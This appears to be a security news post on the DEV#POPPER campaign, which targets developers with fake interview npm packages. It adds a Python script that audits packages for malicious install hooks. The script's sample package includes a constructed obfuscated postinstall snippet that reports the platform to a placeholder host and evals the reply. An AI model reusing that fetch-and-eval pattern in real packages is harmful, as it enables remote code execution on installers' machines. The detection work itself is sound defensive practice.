DEV#POPPER
01 Aug

“DEV#POPPER” Malware targets software developers

A new malware campaign, dubbed DEV#POPPER and linked to North Korea, is targeting software developers across Windows, Linux, and macOS systems.

This sophisticated attack exploits social engineering tactics to trick individuals into downloading malware disguised as software necessary for a job interview, with victims identified in South Korea, North America, Europe, and the Middle East.

Securonix researchers Den Iuzvyk and Tim Peck describe DEV#POPPER as an advanced form of manipulation aimed at extracting confidential information from unsuspecting targets. The campaign has been connected to artifacts that deliver an updated, cross-platform variant of the BeaverTail malware. The attack typically begins with perpetrators posing as interviewers who instruct candidates to download a ZIP file containing an npm module. This module runs obfuscated JavaScript that identifies the operating system and initiates communication with a remote server to exfiltrate valuable data.

The malware is also capable of downloading additional payloads, such as a Python backdoor known as InvisibleFerret, which can gather system metadata, access web browser cookies, execute commands, and log keystrokes. Recent updates to the malware include advanced obfuscation techniques and the incorporation of AnyDesk for persistence. The Python script further facilitates the theft of sensitive information from browsers like Google Chrome and Opera. This evolution of the DEV#POPPER campaign illustrates a significant increase in the capabilities of the attackers, focusing on multi-stage attacks to exfiltrate sensitive data.
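The npm module handed to the candidate is the point where a defender can intervene before anything runs. The script below is an added example, not code from the Securonix report or from the campaign, that triages an unpacked npm package for the two traits described above: lifecycle hooks that execute on install, and obfuscated JavaScript that fingerprints the operating system and reaches out to a remote host. The indicator patterns, the sample package contents, and the hostname `example.invalid` are constructed assumptions.

```python
import json
import math
import re
from collections import Counter

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristic indicators (assumed, not from the report), checked on raw and de-escaped source.
SUSPICIOUS_PATTERNS = {
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "os_fingerprint": re.compile(r"process\.platform|['\"]platform['\"]|require\(['\"]os['\"]\)"),
    "network": re.compile(r"['\"](https?|net|dgram)['\"]|\bfetch\s*\("),
    "encoded_blob": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}|['\"][A-Za-z0-9+/=]{120,}['\"]"),
}

def decode_hex_escapes(source):
    """Resolve \\xNN escapes so a hex-escaped string table shows its plain tokens."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), source)

def shannon_entropy(text):
    """Bits per character; packed or encoded JS scores higher than readable code."""
    n = len(text) or 1
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())

def audit_package(files):
    """files maps path -> content. Reports install-time hooks and per-file indicator hits."""
    report = {"lifecycle_hooks": {}, "files": {}}
    manifest = json.loads(files.get("package.json", "{}"))
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            report["lifecycle_hooks"][hook] = cmd
    for path, content in files.items():
        if not path.endswith(".js"):
            continue
        decoded = decode_hex_escapes(content)
        hits = sorted(name for name, rx in SUSPICIOUS_PATTERNS.items()
                      if rx.search(content) or rx.search(decoded))
        if hits:
            report["files"][path] = {"hits": hits, "entropy": round(shannon_entropy(content), 2)}
    return report

# Constructed sample (not the campaign's code): a postinstall hook runs a script whose
# string table is hex-escaped to hide 'platform' and 'https' from a naive grep.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({"name": "coding-challenge", "scripts": {"postinstall": "node lib/setup.js"}}),
    "lib/setup.js": ("var _0x1a=['\\x70\\x6c\\x61\\x74\\x66\\x6f\\x72\\x6d','\\x68\\x74\\x74\\x70\\x73'];"
                     "var p=process[_0x1a[0]];var h=require(_0x1a[1]);h.get('https://example.invalid/c?p='+p,function(r){eval(r);});"),
    "lib/util.js": "module.exports = function add(a, b) { return a + b; };",
}

if __name__ == "__main__":
    print(json.dumps(audit_package(SAMPLE_PACKAGE), indent=2))
```

Run against a real unpacked archive by reading each file into the same path-to-content mapping; a postinstall hook combined with de-escaped hits for OS fingerprinting and network access is the pattern to stop on before `npm install` is ever run.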